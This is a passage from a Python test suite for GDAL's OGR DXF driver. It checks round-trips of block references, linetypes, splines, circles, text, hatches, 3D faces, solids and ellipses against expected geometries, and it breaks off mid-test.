    lyr = ds.CreateLayer('entities')

    # Define block "XMark": two crossing line segments.
    dst_feat = ogr.Feature(feature_def=blyr.GetLayerDefn())
    dst_feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(
        'GEOMETRYCOLLECTION( LINESTRING(0 0,1 1),LINESTRING(1 0,0 1))'))
    dst_feat.SetField('Block', 'XMark')
    blyr.CreateFeature(dst_feat)

    # Define block "Block2": two disjoint polygons.
    dst_feat = ogr.Feature(feature_def=blyr.GetLayerDefn())
    dst_feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(
        'GEOMETRYCOLLECTION( POLYGON((10 10,10 20,20 20,20 10,10 10)),POLYGON((10 -10,10 -20,20 -20,20 -10,10 -10)))'))
    dst_feat.SetField('Block', 'Block2')
    blyr.CreateFeature(dst_feat)

    # Define block "Block3": a point plus a line.
    dst_feat = ogr.Feature(feature_def=blyr.GetLayerDefn())
    dst_feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt(
        'GEOMETRYCOLLECTION( POINT(1 2),LINESTRING(0 0,1 1))'))
    dst_feat.SetField('Block', 'Block3')
    blyr.CreateFeature(dst_feat)

    # Write a block reference feature.
    dst_feat = ogr.Feature(feature_def=lyr.GetLayerDefn())
    dst_feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt('POINT(200 100)'))
    dst_feat.SetField('Layer', 'abc')
    dst_feat.SetField('BlockName', 'XMark')
    lyr.CreateFeature(dst_feat)

    # Write a block reference feature for a non-existent block; the driver
    # should fall back to writing the insertion point itself.
    dst_feat = ogr.Feature(feature_def=lyr.GetLayerDefn())
    dst_feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt('POINT(300 50)'))
    dst_feat.SetField('Layer', 'abc')
    dst_feat.SetField('BlockName', 'DoesNotExist')
    lyr.CreateFeature(dst_feat)

    # Write a block reference feature for a block defined only in the
    # header template (STAR).
    dst_feat = ogr.Feature(feature_def=lyr.GetLayerDefn())
    dst_feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt('POINT(250 200)'))
    dst_feat.SetField('Layer', 'abc')
    dst_feat.SetField('BlockName', 'STAR')
    lyr.CreateFeature(dst_feat)

    # Write a block reference feature with scaling and rotation.
    dst_feat = ogr.Feature(feature_def=lyr.GetLayerDefn())
    dst_feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt('POINT(300 100)'))
    dst_feat.SetField('BlockName', 'XMark')
    dst_feat.SetField('BlockAngle', '30')
    dst_feat.SetFieldDoubleList(lyr.GetLayerDefn().GetFieldIndex('BlockScale'),
                                [4.0, 5.0, 6.0])
    lyr.CreateFeature(dst_feat)

    # Write a Block2 reference feature.
    dst_feat = ogr.Feature(feature_def=lyr.GetLayerDefn())
    dst_feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt('POINT(350 100)'))
    dst_feat.SetField('Layer', 'abc')
    dst_feat.SetField('BlockName', 'Block2')
    lyr.CreateFeature(dst_feat)

    # Write a Block3 reference feature.
    dst_feat = ogr.Feature(feature_def=lyr.GetLayerDefn())
    dst_feat.SetGeometryDirectly(ogr.CreateGeometryFromWkt('POINT(400 100)'))
    dst_feat.SetField('Layer', 'abc')
    dst_feat.SetField('BlockName', 'Block3')
    lyr.CreateFeature(dst_feat)

    ds = None

    # Reopen and check contents.
    ds = ogr.Open('tmp/dxf_17.dxf')
    lyr = ds.GetLayer(0)

    # Check first feature: XMark inlined at (200 100).
    feat = lyr.GetNextFeature()
    if feat.GetField('SubClasses') != 'AcDbEntity:AcDbBlockReference':
        gdaltest.post_reason('Got wrong subclasses for feature 1.')
        return 'fail'
    if ogrtest.check_feature_geometry(feat, 'MULTILINESTRING ((200 100,201 101),(201 100,200 101))'):
        print('Feature 1')
        return 'fail'

    # Check 2nd feature: unknown block collapses to a plain point.
    feat = lyr.GetNextFeature()
    if feat.GetField('SubClasses') != 'AcDbEntity:AcDbPoint':
        gdaltest.post_reason('Got wrong subclasses for feature 2.')
        return 'fail'
    if ogrtest.check_feature_geometry(feat, 'POINT (300 50)'):
        print('Feature 2')
        return 'fail'

    # Check 3rd feature: template-defined STAR block inlined at (250 200).
    feat = lyr.GetNextFeature()
    if feat.GetField('SubClasses') != 'AcDbEntity:AcDbBlockReference':
        gdaltest.post_reason('Got wrong subclasses for feature 3.')
        return 'fail'
    if ogrtest.check_feature_geometry(feat, 'MULTILINESTRING ((249.971852502328943 201.04145741382942 0,250.619244948763452 198.930395088499495 0),(250.619244948763452 198.930395088499495 0,249.042985079183779 200.47850746040811 0),(249.042985079183779 200.47850746040811 0,251.04145741382942 200.365917469723854 0),(251.04145741382942 200.365917469723854 0,249.52149253959189 198.95854258617058 0),(249.52149253959189 198.95854258617058 0,249.943705004657858 201.013309916158363 0))'):
        print('Feature 3')
        return 'fail'

    # Check 4th feature (scaled and rotated XMark).
    feat = lyr.GetNextFeature()
    if feat.GetField('SubClasses') != 'AcDbEntity:AcDbBlockReference':
        gdaltest.post_reason('Got wrong subclasses for feature 4.')
        return 'fail'
    if ogrtest.check_feature_geometry(feat, 'MULTILINESTRING ((300 100,300.964101615137736 106.330127018922198), (303.464101615137736 102.0,297.5 104.330127018922198))'):
        print('Feature 4')
        return 'fail'

    # Check 5th feature (Block2's two polygons translated to (350 100)).
    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(feat, 'MULTIPOLYGON (((360 110,360 120,370 120,370 110,360 110)),((360 90,360 80,370 80,370 90,360 90)))'):
        print('Feature 5')
        return 'fail'

    # Check 6th feature (Block3's point+line translated to (400 100)).
    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(feat, 'GEOMETRYCOLLECTION (POINT (401 102),LINESTRING (400 100,401 101))'):
        # Bug fix: this diagnostic previously mislabelled itself 'Feature 5'.
        print('Feature 6')
        return 'fail'

    # Cleanup
    lyr = None
    ds = None

    os.unlink('tmp/dxf_17.dxf')

    return 'success'
###############################################################################
# Write a file with line patterns, and make sure corresponding Linetypes are
# created.
def ogr_dxf_18():
    """Write features carrying PEN dash patterns and verify that the driver
    creates (or reuses) corresponding DXF Linetype table entries on
    read-back.  Returns 'success' or 'fail' (gdaltest convention)."""

    out_ds = ogr.GetDriverByName('DXF').CreateDataSource(
        'tmp/dxf_18.dxf', ['HEADER=data/header_extended.dxf'])
    out_lyr = out_ds.CreateLayer('entities')

    # (linetype name or None, PEN style string, geometry WKT) per feature:
    #  1. predefined LTYPE from the header template
    #  2. named linetype that the header does not predefine
    #  3. unnamed - driver should auto-create a linetype
    #  4. pattern proportional to a predefined linetype
    #  5. pattern proportional to an auto-created linetype
    pens = [
        ('DASHED', 'PEN(c:#ffff00,w:2g,p:"12.0g 6.0g")', 'LINESTRING(0 0,25 25)'),
        ('DOTTED', 'PEN(c:#ffff00,w:2g,p:"0.0g 4.0g")', 'LINESTRING(5 5,30 30)'),
        (None, 'PEN(c:#ffff00,w:2g,p:"3.0g 4.0g")', 'LINESTRING(5 5,40 30)'),
        (None, 'PEN(c:#ffff00,w:0.3mm,p:"6.35g 3.0617284g")', 'LINESTRING(5 5,40 20)'),
        (None, 'PEN(c:#ffff00,w:20px,p:"6.0g 8.0g")', 'LINESTRING(5 5,40 10)'),
    ]
    for linetype, pen_style, wkt in pens:
        feature = ogr.Feature(feature_def=out_lyr.GetLayerDefn())
        feature.SetGeometryDirectly(ogr.CreateGeometryFromWkt(wkt))
        if linetype is not None:
            feature.SetField('Linetype', linetype)
        feature.SetStyleString(pen_style)
        out_lyr.CreateFeature(feature)

    out_ds = None

    # Read the file back and verify each feature's linetype and style.
    in_ds = ogr.Open('tmp/dxf_18.dxf')
    in_lyr = in_ds.GetLayer(0)

    # Feature 1: predefined DASHED, pattern normalised by the driver.
    feature = in_lyr.GetNextFeature()
    if feature.GetField('Linetype') != 'DASHED':
        gdaltest.post_reason('Got wrong linetype. (1)')
        return 'fail'
    if feature.GetStyleString() != 'PEN(c:#ffff00,w:2g,p:"12.7g 6.1234567892g")':
        print(feature.GetStyleString())
        gdaltest.post_reason("got wrong style string (1)")
        return 'fail'
    if ogrtest.check_feature_geometry(feature, 'LINESTRING (0 0,25 25)'):
        return 'fail'

    # Feature 2: DOTTED linetype was created on the fly.
    feature = in_lyr.GetNextFeature()
    if feature.GetField('Linetype') != 'DOTTED':
        gdaltest.post_reason('Got wrong linetype. (2)')
        return 'fail'
    if feature.GetStyleString() != 'PEN(c:#ffff00,w:2g,p:"0g 4g")':
        print(feature.GetStyleString())
        gdaltest.post_reason("got wrong style string (2)")
        return 'fail'
    if ogrtest.check_feature_geometry(feature, 'LINESTRING (5 5,30 30)'):
        return 'fail'

    # Feature 3: nameless pattern got an auto-generated linetype.
    feature = in_lyr.GetNextFeature()
    if feature.GetField('Linetype') != 'AutoLineType-1':
        gdaltest.post_reason('Got wrong linetype. (3)')
        return 'fail'
    if feature.GetStyleString() != 'PEN(c:#ffff00,w:2g,p:"3g 4g")':
        print(feature.GetStyleString())
        gdaltest.post_reason("got wrong style string (3)")
        return 'fail'
    if ogrtest.check_feature_geometry(feature, 'LINESTRING (5 5,40 30)'):
        return 'fail'

    # Feature 4: pattern proportional to DASHED is mapped back onto it.
    feature = in_lyr.GetNextFeature()
    if feature.GetField('Linetype') != 'DASHED':
        gdaltest.post_reason('Got wrong linetype. (4)')
        return 'fail'
    # TODO why did the lineweight go AWOL here?
    if feature.GetStyleString() != 'PEN(c:#ffff00,p:"6.35g 3.0617283946g")':
        print(feature.GetStyleString())
        gdaltest.post_reason("got wrong style string (4)")
        return 'fail'

    # Feature 5: pattern proportional to the auto-created linetype.
    feature = in_lyr.GetNextFeature()
    if feature.GetField('Linetype') != 'AutoLineType-1':
        gdaltest.post_reason('Got wrong linetype. (5)')
        return 'fail'
    if feature.GetStyleString() != 'PEN(c:#ffff00,w:0.01g,p:"6g 8g")':
        print(feature.GetStyleString())
        gdaltest.post_reason("got wrong style string (5)")
        return 'fail'

    # Cleanup
    in_lyr = None
    in_ds = None

    os.unlink('tmp/dxf_18.dxf')

    return 'success'
###############################################################################
# Test writing a file using references to blocks defined entirely in the
# template - no blocks layer transferred.
def ogr_dxf_19():
    """Write a file whose only block reference targets a block defined
    entirely in the header template (no blocks layer is transferred), then
    verify the reference is inlined on read-back."""

    out_ds = ogr.GetDriverByName('DXF').CreateDataSource(
        'tmp/dxf_19.dxf', ['HEADER=data/header_extended.dxf'])
    out_lyr = out_ds.CreateLayer('entities')

    # Single INSERT of the template-defined STAR block.
    feature = ogr.Feature(feature_def=out_lyr.GetLayerDefn())
    feature.SetGeometryDirectly(ogr.CreateGeometryFromWkt('POINT(250 200)'))
    feature.SetField('Layer', 'abc')
    feature.SetField('BlockName', 'STAR')
    out_lyr.CreateFeature(feature)

    out_ds = None

    # Reopen; the STAR geometry should appear translated to (250 200).
    in_ds = ogr.Open('tmp/dxf_19.dxf')
    in_lyr = in_ds.GetLayer(0)

    feature = in_lyr.GetNextFeature()
    if feature.GetField('SubClasses') != 'AcDbEntity:AcDbBlockReference':
        gdaltest.post_reason('Got wrong subclasses for feature 1.')
        return 'fail'
    if ogrtest.check_feature_geometry(feature, 'MULTILINESTRING ((249.971852502328943 201.04145741382942 0,250.619244948763452 198.930395088499495 0),(250.619244948763452 198.930395088499495 0,249.042985079183779 200.47850746040811 0),(249.042985079183779 200.47850746040811 0,251.04145741382942 200.365917469723854 0),(251.04145741382942 200.365917469723854 0,249.52149253959189 198.95854258617058 0),(249.52149253959189 198.95854258617058 0,249.943705004657858 201.013309916158363 0))'):
        return 'fail'

    # Cleanup
    in_lyr = None
    in_ds = None

    os.unlink('tmp/dxf_19.dxf')

    return 'success'
###############################################################################
# SPLINE
def ogr_dxf_20():
    """Read a SPLINE entity (data/spline_qcad.dxf) and verify the driver's
    tessellation against a reference LINESTRING."""

    ds = ogr.Open('data/spline_qcad.dxf')
    lyr = ds.GetLayer(0)

    feat = lyr.GetNextFeature()
    # Expected linestring: the spline sampled by the driver.  A mismatch
    # beyond check_feature_geometry's tolerance fails the test.
    if ogrtest.check_feature_geometry( feat, 'LINESTRING (10.75 62.75,20.637752769146068 63.434832501489716,29.283239084385464 63.396838394381845,36.766943814562865 62.711565975596599,43.169351828522906 61.454563542054103,48.570947995110252 59.70137939067456,53.05221718316956 57.527561818378146,56.693644261545501 55.008659122085049,59.575714099082703 52.220219598715438,61.778911564625851 49.237791545189509,63.383721527019588 46.136923258427423,64.470628855108572 42.993163035349369,65.120118417737459 39.882059172875508,65.412419131869868 36.878358785215056,65.417809785093752 34.025663008687722,65.193643595004147 31.327113252708507,64.796409941597645 28.783146935042897,64.282598204870823 26.394201473456341,63.708697764820236 24.16071428571431,63.131198001442392 22.083122789582241,62.606588294733939 20.161864402825621,62.191358024691354 18.397376543209894,61.941996571311265 16.790096628500525,61.914993314590184 15.340462076462975,62.166837634524704 14.0489103048627,62.754018911111373 12.915878731465167,63.723652286703427 11.940700981548817,65.053571428571416 11.114552964042769,66.690557841792398 10.424954275262921,68.581246558980226 9.859407264767562,70.672272612748785 9.405414282114966,72.910271035711943 9.050477676863418,75.241876860483572 8.782099798571203,77.613725119677511 8.587782996796603,79.97245084590763 8.4550296210979,82.264689071787842 8.371342021033378,84.437074829931987 8.324222546161321,86.436243152953921 8.301173546040012,88.208926721776336 8.289771106365336,89.722559658784164 8.293223374005688,90.990763736417563 8.349615688917151,92.033410218878885 8.501752503862612,92.870370370370395 8.792438271604945,93.521515455094473 9.264477444907039,94.006716737253413 9.960674476531764,94.345845481049565 10.923833819242011,94.558772950685281 12.196759925800654,94.665370410362868 13.82225724897058,94.685509124284636 15.843130241514663,94.639060356652948 18.302183356195791,94.545895371670113 21.242221045776841,94.421471763308503 24.702030018356666,94.215205541358216 28.660279617432039,93.825673773330607 33.049360720184715,93.15014577259474 37.800473760933045,92.085890852519697 42.844819173995376,90.530178326474584 48.113597393690064,88.380277507828495 53.538008854335445,85.533457709950525 59.049253990249873,81.886988246209697 64.578533235751706,77.338138429975174 70.057047025159264,71.784177574615995 75.415995792790937,65.122374993501282 80.586579972965055,57.25 85.5)' ):
        return 'fail'

    ds = None

    return 'success'
###############################################################################
# CIRCLE
def ogr_dxf_21():
    """Read a CIRCLE entity (data/circle.dxf) and verify the driver
    tessellates it into the expected closed 3D LINESTRING."""

    ds = ogr.Open('data/circle.dxf')
    lyr = ds.GetLayer(0)

    feat = lyr.GetNextFeature()
    # The circle (centre (1,2,3), radius 4 judging by the vertex values -
    # TODO confirm against the data file) is approximated by line segments;
    # the first and last vertices coincide to close the ring.
    if ogrtest.check_feature_geometry( feat, 'LINESTRING (5 2 3,4.990256201039297 1.720974105023499 3,4.961072274966281 1.443307596159738 3,4.912590402935223 1.168353236728963 3,4.845046783753276 0.897450576732003 3,4.758770483143634 0.631919426697325 3,4.654181830570403 0.373053427696799 3,4.531790371435708 0.122113748856437 3,4.392192384625703 -0.11967705693282 3,4.23606797749979 -0.351141009169893 3,4.064177772475912 -0.571150438746157 3,3.877359201354605 -0.778633481835989 3,3.676522425435433 -0.972579301909577 3,3.462645901302633 -1.152043014426888 3,3.236771613882987 -1.316150290220167 3,3.0 -1.464101615137754 3,2.75348458715631 -1.595176185196668 3,2.498426373663648 -1.70873541826715 3,2.23606797749979 -1.804226065180614 3,1.967687582398672 -1.881182905103986 3,1.694592710667722 -1.939231012048832 3,1.418113853070614 -1.978087581473093 3,1.139597986810004 -1.997563308076383 3,0.860402013189997 -1.997563308076383 3,0.581886146929387 -1.978087581473094 3,0.305407289332279 -1.939231012048832 3,0.032312417601329 -1.881182905103986 3,-0.236067977499789 -1.804226065180615 3,-0.498426373663648 -1.70873541826715 3,-0.75348458715631 -1.595176185196668 3,-1.0 -1.464101615137755 3,-1.236771613882987 -1.316150290220167 3,-1.462645901302633 -1.152043014426888 3,-1.676522425435433 -0.972579301909577 3,-1.877359201354605 -0.778633481835989 3,-2.064177772475912 -0.571150438746158 3,-2.236067977499789 -0.351141009169893 3,-2.392192384625704 -0.11967705693282 3,-2.531790371435707 0.122113748856436 3,-2.654181830570403 0.373053427696798 3,-2.758770483143633 0.631919426697324 3,-2.845046783753275 0.897450576732001 3,-2.912590402935223 1.168353236728963 3,-2.961072274966281 1.443307596159737 3,-2.990256201039297 1.720974105023498 3,-3.0 2.0 3,-2.990256201039297 2.279025894976499 3,-2.961072274966281 2.556692403840262 3,-2.912590402935223 2.831646763271036 3,-2.845046783753276 3.102549423267996 3,-2.758770483143634 3.368080573302675 3,-2.654181830570404 3.626946572303199 3,-2.531790371435708 3.877886251143563 3,-2.392192384625704 4.119677056932819 3,-2.23606797749979 4.351141009169892 3,-2.064177772475912 4.571150438746157 3,-1.877359201354604 4.778633481835989 3,-1.676522425435434 4.972579301909576 3,-1.462645901302632 5.152043014426889 3,-1.236771613882989 5.316150290220166 3,-1.0 5.464101615137753 3,-0.753484587156311 5.595176185196667 3,-0.498426373663649 5.70873541826715 3,-0.23606797749979 5.804226065180615 3,0.032312417601329 5.881182905103985 3,0.305407289332279 5.939231012048833 3,0.581886146929387 5.978087581473094 3,0.860402013189993 5.997563308076383 3,1.139597986810005 5.997563308076383 3,1.418113853070612 5.978087581473094 3,1.69459271066772 5.939231012048833 3,1.96768758239867 5.881182905103986 3,2.236067977499789 5.804226065180615 3,2.498426373663648 5.70873541826715 3,2.75348458715631 5.595176185196668 3,3.0 5.464101615137754 3,3.236771613882985 5.316150290220168 3,3.462645901302634 5.152043014426887 3,3.676522425435431 4.972579301909578 3,3.877359201354603 4.778633481835991 3,4.064177772475912 4.571150438746159 3,4.23606797749979 4.351141009169893 3,4.392192384625702 4.119677056932823 3,4.531790371435708 3.877886251143563 3,4.654181830570404 3.626946572303201 3,4.758770483143634 3.368080573302675 3,4.845046783753275 3.102549423267999 3,4.912590402935223 2.831646763271039 3,4.961072274966281 2.556692403840263 3,4.990256201039298 2.279025894976499 3,5.0 2.0 3)' ):
        return 'fail'

    ds = None

    return 'success'
###############################################################################
# TEXT
def ogr_dxf_22():
    """TEXT/MTEXT round-trip: read an MTEXT feature (escape sequences
    translated), write it back out as TEXT, re-read it, and finally re-read
    the source with escape-sequence translation disabled."""

    # Read MTEXT feature
    ds = ogr.Open('data/text.dxf')
    lyr = ds.GetLayer(0)

    # Build the expected decoded text.  On Python 3 a plain literal with a
    # \u escape suffices; on Python 2 the u'' literal must be hidden inside
    # exec() so this file stays parseable, and the result is UTF-8 encoded
    # to match GetFieldAsString's byte output.
    if version_info >= (3,0,0):
        test_text = 'test\ttext ab/c~d\u00B1ef^g.h#i jklm'
    else:
        exec("test_text = u'test\ttext ab/c~d\u00B1ef^g.h#i jklm'")
        test_text = test_text.encode('utf-8')

    feat = lyr.GetNextFeature()
    if feat.GetFieldAsString('Text') != test_text:
        gdaltest.post_reason('bad attribute')
        feat.DumpReadable()
        return 'fail'
    style = feat.GetStyleString()
    if style != 'LABEL(f:"SwissCheese",bo:1,t:"' + test_text + '",a:45,s:10g,w:51,c:#ff0000)':
        gdaltest.post_reason('bad style')
        feat.DumpReadable()
        print(style)
        return 'fail'
    if ogrtest.check_feature_geometry( feat, 'POINT(1 2 3)' ):
        gdaltest.post_reason('bad geometry')
        feat.DumpReadable()
        return 'fail'

    # Write text feature reusing the style string and geometry just read.
    out_ds = ogr.GetDriverByName('DXF').CreateDataSource('/vsimem/ogr_dxf_22.dxf')
    out_lyr = out_ds.CreateLayer( 'entities' )
    out_feat = ogr.Feature(out_lyr.GetLayerDefn())
    out_feat.SetStyleString(style)
    out_feat.SetGeometry(feat.GetGeometryRef())
    out_lyr.CreateFeature(out_feat)
    out_feat = None
    out_lyr = None
    out_ds = None
    ds = None

    # Check written file: text, style and geometry must survive unchanged.
    ds = ogr.Open('/vsimem/ogr_dxf_22.dxf')
    lyr = ds.GetLayer(0)

    feat = lyr.GetNextFeature()
    if feat.GetFieldAsString('Text') != test_text:
        gdaltest.post_reason('bad attribute')
        feat.DumpReadable()
        return 'fail'
    style = feat.GetStyleString()
    if style != 'LABEL(f:"SwissCheese",bo:1,t:"' + test_text + '",a:45,s:10g,w:51,c:#ff0000)':
        gdaltest.post_reason('bad style')
        feat.DumpReadable()
        print(style)
        return 'fail'
    if ogrtest.check_feature_geometry( feat, 'POINT(1 2 3)' ):
        gdaltest.post_reason('bad geometry')
        feat.DumpReadable()
        return 'fail'

    ds = None

    gdal.Unlink('/vsimem/ogr_dxf_22.dxf')

    # Now try reading in the MTEXT feature without translating escape
    # sequences; the raw MTEXT control codes should come through verbatim.
    gdal.SetConfigOption('DXF_TRANSLATE_ESCAPE_SEQUENCES', 'FALSE')
    ds = ogr.Open('data/text.dxf')
    gdal.SetConfigOption('DXF_TRANSLATE_ESCAPE_SEQUENCES', None)
    lyr = ds.GetLayer(0)

    feat = lyr.GetNextFeature()
    # NOTE: the expected literal deliberately contains raw backslash
    # sequences (\A, \p, \S, ...) that Python leaves as literal characters.
    if feat.GetFieldAsString('Text') != '\A1;test^Itext\~\pt0.2;{\H0.7x;\Sab\/c\~d%%p^ ef\^ g.h\#i;} j{\L\Ok\ol}m':
        gdaltest.post_reason('bad attribute with DXF_TRANSLATE_ESCAPE_SEQUENCES = FALSE')
        feat.DumpReadable()
        return 'fail'

    ds = None

    return 'success'
###############################################################################
# POLYGON with hole
def ogr_dxf_23():
    """Round-trip a POLYGON with an interior ring (written as HATCH) and its
    BRUSH style through a /vsimem DXF file."""

    ring_wkt = 'POLYGON ((0 0,0 10,10 10,10 0,0 0),(1 1,1 9,9 9,9 1,1 1))'

    # Write the polygon with a solid red fill.
    writer_ds = ogr.GetDriverByName('DXF').CreateDataSource('/vsimem/ogr_dxf_23.dxf')
    writer_lyr = writer_ds.CreateLayer('entities')
    feature = ogr.Feature(writer_lyr.GetLayerDefn())
    feature.SetStyleString('BRUSH(fc:#ff0000)')
    feature.SetGeometry(ogr.CreateGeometryFromWkt(ring_wkt))
    writer_lyr.CreateFeature(feature)
    feature = None
    writer_lyr = None
    writer_ds = None

    # Read it back: both the style and both rings must survive.
    reader_ds = ogr.Open('/vsimem/ogr_dxf_23.dxf')
    feature = reader_ds.GetLayer(0).GetNextFeature()

    read_style = feature.GetStyleString()
    if read_style != 'BRUSH(fc:#ff0000)':
        gdaltest.post_reason('bad style')
        print(read_style)
        return 'fail'

    if ogrtest.check_feature_geometry(feature, ring_wkt):
        gdaltest.post_reason('bad geometry')
        return 'fail'

    reader_ds = None

    gdal.Unlink('/vsimem/ogr_dxf_23.dxf')

    return 'success'
###############################################################################
# HATCH
def ogr_dxf_24():
    """Read HATCH boundaries, coarsening arc tessellation to a 45-degree
    step for the two arc-bearing features."""

    hatch_ds = ogr.Open('data/hatch.dxf')
    hatch_lyr = hatch_ds.GetLayer(0)

    def next_feature_coarse_arcs(layer):
        # Fetch one feature with OGR_ARC_STEPSIZE forced to 45 degrees,
        # restoring the default immediately afterwards.
        gdal.SetConfigOption('OGR_ARC_STEPSIZE', '45')
        fetched = layer.GetNextFeature()
        gdal.SetConfigOption('OGR_ARC_STEPSIZE', None)
        return fetched

    feature = next_feature_coarse_arcs(hatch_lyr)
    if ogrtest.check_feature_geometry(feature, 'POLYGON ((2 1,1.646446609406726 0.853553390593274,1.5 0.5,1.646446609406726 0.146446609406726,2 0,2.0 0.0,2.146446609406726 -0.353553390593274,2.5 -0.5,2.853553390593274 -0.353553390593274,3.0 -0.0,3 0,3.353553390593274 0.146446609406726,3.5 0.5,3.353553390593274 0.853553390593273,3 1,2.853553390593274 1.353553390593274,2.5 1.5,2.146446609406726 1.353553390593274,2 1))'):
        return 'fail'

    feature = next_feature_coarse_arcs(hatch_lyr)
    if ogrtest.check_feature_geometry(feature, 'POLYGON ((0.0 0.0 0,-0.353553390593274 0.146446609406726 0,-0.5 0.5 0,-0.353553390593274 0.853553390593274 0,-0.0 1.0 0,0.0 1.0 0,0.146446609406726 1.353553390593274 0,0.5 1.5 0,0.853553390593274 1.353553390593274 0,1.0 1.0 0,1.0 1.0 0,1.353553390593274 0.853553390593274 0,1.5 0.5 0,1.353553390593274 0.146446609406727 0,1.0 0.0 0,1 0 0,0.853553390593274 -0.353553390593274 0,0.5 -0.5 0,0.146446609406726 -0.353553390593274 0,0.0 -0.0 0,0.0 0.0 0))'):
        return 'fail'

    # The third boundary has no arcs, so no step-size override is needed.
    feature = hatch_lyr.GetNextFeature()
    if ogrtest.check_feature_geometry(feature, 'POLYGON ((-1 -1,-1 0,0 0,-1 -1))'):
        return 'fail'

    hatch_ds = None

    return 'success'
###############################################################################
# 3DFACE
def ogr_dxf_25():
    """Read 3DFACE entities: each becomes a closed POLYGON ring (a triangle
    and a quadrilateral here)."""

    face_ds = ogr.Open('data/3dface.dxf')
    face_lyr = face_ds.GetLayer(0)

    expected_faces = [
        # Three-vertex face closes back onto its first vertex.
        'POLYGON ((10 20 30,11 21 31,12 22 32,10 20 30))',
        # Four-vertex face.
        'POLYGON ((10 20 30,11 21 31,12 22 32,13 23 33,10 20 30))',
    ]
    for expected_wkt in expected_faces:
        feature = face_lyr.GetNextFeature()
        if ogrtest.check_feature_geometry(feature, expected_wkt):
            feature.DumpReadable()
            return 'fail'

    face_ds = None

    return 'success'
###############################################################################
# SOLID (#5380)
def ogr_dxf_26():
    """Read a SOLID entity (#5380): it should become a closed quadrilateral
    POLYGON."""

    solid_ds = ogr.Open('data/solid.dxf')
    feature = solid_ds.GetLayer(0).GetNextFeature()

    if ogrtest.check_feature_geometry(feature, 'POLYGON ((2.716846 2.762514,2.393674 1.647962,4.391042 1.06881,4.714214 2.183362,2.716846 2.762514))'):
        feature.DumpReadable()
        return 'fail'

    solid_ds = None

    return 'success'
###############################################################################
# Test reading a DXF file without .dxf extensions (#5994)
def ogr_dxf_27():
    """Test reading a DXF file without a .dxf extension (#5994).

    Copies a known-good DXF into an extensionless /vsimem path and checks
    that the driver still recognises it.  Returns 'success' or 'fail'.
    """

    # Use a context manager so the source file handle is closed promptly;
    # the original code leaked the handle returned by open().
    with open('data/solid.dxf') as src:
        gdal.FileFromMemBuffer('/vsimem/a_dxf_without_extension', src.read())

    ds = ogr.Open('/vsimem/a_dxf_without_extension')
    if ds is None:
        return 'fail'

    gdal.Unlink('/vsimem/a_dxf_without_extension')

    return 'success'
###############################################################################
# Test reading a ELLIPSE with Z extrusion axis value of -1.0 (#5075)
def ogr_dxf_28():
    """Read ELLIPSE entities whose extrusion axis has Z = -1.0 (#5075) and
    verify both arcs are mirrored/tessellated correctly."""

    ds = ogr.Open('data/ellipse_z_extrusion_minus_1.dxf')
    lyr = ds.GetLayer(0)

    # First elliptical arc.
    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (247.379588068074 525.677518653024 0,247.560245171261 525.685592896308 0,247.739941456101 525.705876573267 0,247.917852718752 525.738276649788 0,248.09316294264 525.782644518081 0,248.265068041245 525.838776678293 0,248.432779546163 525.90641567189 0,248.595528223532 525.985251262527 0,248.752567602242 526.074921858996 0,248.903177397731 526.175016173715 0,249.046666815684 526.285075109164 0,249.182377720457 526.404593863601 0,249.309687653722 526.533024246411 0,249.428012689458 526.669777192466 0,249.536810112221 526.814225463957 0,249.635580906384 526.965706527318 0,249.723872044951 527.123525592032 0)' ):
        feat.DumpReadable()
        return 'fail'

    # Second elliptical arc.
    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (290.988651614349 531.01336644407 0,290.900681473157 531.171364661134 0,290.823607338001 531.334954880971 0,290.757782720911 531.503386772611 0,290.703509536322 531.675887798031 0,290.661036716299 531.85166675552 0,290.630559068775 532.029917408641 0,290.612216384031 532.209822184155 0,290.606092793529 532.390555921946 0,290.612216384031 532.571289659737 0,290.630559068775 532.751194435252 0,290.661036716299 532.929445088373 0,290.703509536321 533.105224045862 0,290.75778272091 533.277725071282 0,290.823607338 533.446156962922 0,290.900681473156 533.60974718276 0,290.988651614348 533.767745399824 0)' ):
        feat.DumpReadable()
        return 'fail'

    ds = None

    return 'success'
###############################################################################
# SPLINE with weights
def ogr_dxf_29():
    """Read SPLINE entities with control-point weights
    (data/spline_weight.dxf): the same curve sampled with no weight, a
    weight of 2.0 and a weight of 0.5 on the third control point."""

    ds = ogr.Open('data/spline_weight.dxf')
    lyr = ds.GetLayer(0)

    # spline 227, no weight
    feat = lyr.GetNextFeature()
    if ogrtest.check_feature_geometry( feat, 'LINESTRING (2 2, 2.10256409645081 2.15371131896973, 2.20512819290161 2.3066132068634, 2.307692527771 2.4578971862793, 2.41025638580322 2.6067533493042, 2.51282024383545 2.75237274169922, 2.61538457870483 2.89394640922546, 2.71794891357422 3.03066444396973, 2.82051301002502 3.16171884536743, 2.92307710647583 3.28629970550537, 3.02564096450806 3.40359783172607, 3.12820529937744 3.51280379295349, 3.23076939582825 3.61310863494873, 3.33333325386047 3.70370388031006, 3.43589782714844 3.78377938270569, 3.53846144676208 3.85252642631531, 3.64102602005005 3.90913581848145, 3.74358987808228 3.95279765129089, 3.84615445137024 3.98270392417908, 3.94871830940247 3.99804472923279, 4.05128240585327 3.99804425239563, 4.15384674072266 3.9827036857605, 4.25641107559204 3.95279765129089, 4.35897541046143 3.90913534164429, 4.46153926849365 3.85252571105957, 4.56410360336304 3.78377866744995, 4.66666793823242 3.70370292663574, 4.76923179626465 3.61310815811157, 4.87179613113403 3.51280236244202, 4.97436046600342 3.40359592437744, 5.07692432403564 3.2862982749939, 5.17948865890503 3.16171741485596, 5.28205299377441 3.03066277503967, 5.38461685180664 2.89394426345825, 5.48718070983887 2.75237035751343, 5.58974552154541 2.60675096511841, 5.69230937957764 2.45789456367493, 5.79487323760986 2.30661058425903, 5.89743757247925 2.15370845794678, 6 2)' ):
        feat.DumpReadable()
        return 'fail'

    # spline 261, weight(3) = 2.0
